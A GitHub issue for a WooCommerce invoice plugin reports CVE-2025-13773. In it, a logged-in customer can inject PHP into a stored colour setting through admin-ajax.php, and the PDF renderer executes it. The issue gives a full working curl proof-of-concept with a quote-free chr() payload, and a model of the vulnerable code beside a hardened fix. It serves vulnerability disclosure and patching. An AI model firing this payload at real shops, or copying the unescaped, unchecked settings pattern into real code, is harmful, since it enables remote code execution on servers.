
Vulnerability reported by Wordfence #470

@anjtha-21

Description


Prerequisites

  • I have carried out troubleshooting steps and I believe I have found a bug.
  • I have searched for similar bugs in both open and closed issues and cannot find a duplicate.

Describe the bug

A critical security vulnerability (CVE-2025-13773) has been responsibly disclosed by Wordfence researchers shark3y and Marcin Dudek (dudekmar).
The issue affects Print Invoice & Delivery Notes for WooCommerce ≤ 5.8.0 and allows remote code execution from a low-privilege account: a logged-in customer can overwrite the plugin's document settings through admin-ajax.php, and the injected value is executed as PHP the next time an invoice PDF is rendered (an administrator printing the invoice, or the plugin attaching the invoice to an order email). No administrator credentials are needed, but the attacker does need a customer-level session and PDF generation must be triggered.

Steps to reproduce

  1. Install WooCommerce and the Print Invoice & Delivery Notes for WooCommerce plugin
  2. Create a customer account and place an order
  3. Obtain the customer's wordpress_logged_in_* cookie (e.g., from browser DevTools)
  4. As the customer, send the following request to inject the RCE payload into the plugin's document settings (the request goes through the heartbeat AJAX action, which any logged-in user may call):

     curl -s -X POST 'https://target/wp-admin/admin-ajax.php' \
     -H 'Content-Type: application/x-www-form-urlencoded' \
     -H 'Cookie: wordpress_logged_in_XXXX=CUSTOMER_COOKIE_VALUE' \
     --data-urlencode 'action=heartbeat' \
     --data-urlencode 'wcdn_general[template]=simple' \
     --data-urlencode 'wcdn_invoice[status][]=customer_invoice' \
     --data-urlencode 'invoice[document_setting][active]=1' \
     --data-urlencode 'invoice[document_setting][document_setting_font_size]=14' \
     --data-urlencode 'invoice[document_setting][document_setting_text_align]=left' \
     --data-urlencode 'invoice[document_setting][document_setting_text_colour]=red"></h1></div><script type=text/php>file_put_contents(ABSPATH.chr(114).chr(99).chr(101).chr(46).chr(116).chr(120).chr(116),php_uname());</script><div><h1 style="color:blue'

  5. Trigger PDF generation by one of the following methods:
  • As an administrator, go to WooCommerce → Orders → select the order → click "Print Invoice"
  • Configure the plugin to attach PDF invoices to order emails, then trigger an order status change email
  6. Verify RCE by visiting https://TARGET/rce.txt: it will display the server's php_uname() output (kernel version, architecture, etc.)

Note: WordPress adds slashes to incoming request data (wp_magic_quotes()), so literal quotes inside the PHP payload would be escaped and break the script. The payload therefore builds the filename rce.txt from chr() calls (114 99 101 46 116 120 116 = r c e . t x t) and needs no quotes at all. The opening fragment "></h1></div> closes the style attribute and the elements the colour setting is interpolated into, and the trailing <div><h1 style="color:blue re-opens them so the template stays well-formed. The stored setting is placed into the invoice template unescaped, the PDF renderer executes the <script type=text/php> block at generation time, and the payload writes the output of php_uname() to a file in the webroot as proof of code execution.
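The following is an added example, not the plugin's own code: it models the two defects the steps above chain together (a settings save reachable by any logged-in user, and an unescaped setting rendered into a template that the PDF library executes as PHP) beside a hardened version. The function, option and nonce names (wcdn_model_*) are assumed for illustration and only mirror the field names in the PoC request; the admin_init hook is likewise an assumption, chosen because admin-ajax.php fires it for every logged-in user, including a customer.

```php
<?php
/**
 * Illustrative model of the bug and its fix. NOT the plugin's own code;
 * all names below are assumed. Requires WordPress (update_option,
 * current_user_can, check_admin_referer, sanitize_hex_color, esc_attr).
 */

// --- BEFORE (vulnerable pattern) ------------------------------------------
// In the model this is hooked on admin_init, which also runs for
// wp-admin/admin-ajax.php?action=heartbeat. A logged-in customer therefore
// reaches it. No capability check, no nonce, and the colour is stored verbatim.
function wcdn_model_save_settings_vulnerable() {
    if ( ! isset( $_POST['invoice']['document_setting'] ) ) {
        return;
    }
    $settings = wp_unslash( $_POST['invoice']['document_setting'] );
    update_option( 'wcdn_model_document_setting', $settings );
}
// add_action( 'admin_init', 'wcdn_model_save_settings_vulnerable' );

// The template then interpolates the stored value into inline CSS without
// escaping. The "></h1></div><script type=text/php>...</script><div><h1 style="color:
// payload breaks out of the attribute and, because the PDF renderer honours
// <script type="text/php">, runs as PHP when the invoice is generated.
function wcdn_model_render_heading_vulnerable( $order_number ) {
    $s = get_option( 'wcdn_model_document_setting', array() );
    return '<h1 style="color:' . $s['document_setting_text_colour'] . '">Invoice #' . $order_number . '</h1>';
}

// --- AFTER (hardened) -------------------------------------------------------
function wcdn_model_save_settings_hardened() {
    if ( ! isset( $_POST['invoice']['document_setting'] ) ) {
        return;
    }
    // 1. Authorisation: only shop managers / administrators may change settings.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        return;
    }
    // 2. CSRF: require the nonce emitted by the settings form (assumed names).
    check_admin_referer( 'wcdn_model_save_settings', 'wcdn_model_nonce' );

    $raw      = wp_unslash( $_POST['invoice']['document_setting'] );
    $settings = array(
        'active'                       => empty( $raw['active'] ) ? 0 : 1,
        // absint() keeps only a non-negative integer.
        'document_setting_font_size'   => absint( $raw['document_setting_font_size'] ?? 12 ),
        // Whitelist the alignment keywords instead of storing free text.
        'document_setting_text_align'  => in_array( $raw['document_setting_text_align'] ?? '', array( 'left', 'center', 'right' ), true )
            ? $raw['document_setting_text_align']
            : 'left',
        // sanitize_hex_color() returns ''/null for anything that is not #rgb or
        // #rrggbb, so the HTML/PHP payload from the PoC never reaches the DB.
        'document_setting_text_colour' => sanitize_hex_color( $raw['document_setting_text_colour'] ?? '' ) ?: '#000000',
    );
    update_option( 'wcdn_model_document_setting', $settings );
}
add_action( 'admin_init', 'wcdn_model_save_settings_hardened' );

function wcdn_model_render_heading_hardened( $order_number ) {
    $s = get_option( 'wcdn_model_document_setting', array() );
    // 3. Escape at output as well: defence in depth if the option is ever
    //    poisoned by another path. esc_attr() turns " and < into entities, so
    //    the attribute can no longer be closed and no <script> tag is emitted.
    return '<h1 style="color:' . esc_attr( $s['document_setting_text_colour'] ?? '#000000' ) . '">Invoice #' . esc_html( $order_number ) . '</h1>';
}

// 4. Independently of the above, do not render PDFs with inline PHP enabled.
//    <script type="text/php"> is dompdf's inline-PHP syntax and only executes
//    when its isPhpEnabled option is on; if dompdf is the renderer, keep that
//    option off so that even a poisoned template cannot execute code.
```

Of the four controls, the capability check alone would have stopped the reporter's request, and the output-side escaping or disabling inline PHP alone would have turned the stored payload into harmless text in the PDF; a fix should apply all of them rather than rely on one.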

Expected behavior

We need to review this vulnerability and apply the necessary patch to secure the plugin.

WordPress Environment

Isolating the problem

  • I have deactivated other plugins and confirmed this bug occurs when only our plugin is active.
  • This bug happens with a default WordPress theme active, or Storefront.
  • I can reproduce this bug consistently using the steps above.

Additional field

https://support.tychesoftwares.com/conversation/14085?folder_id=63
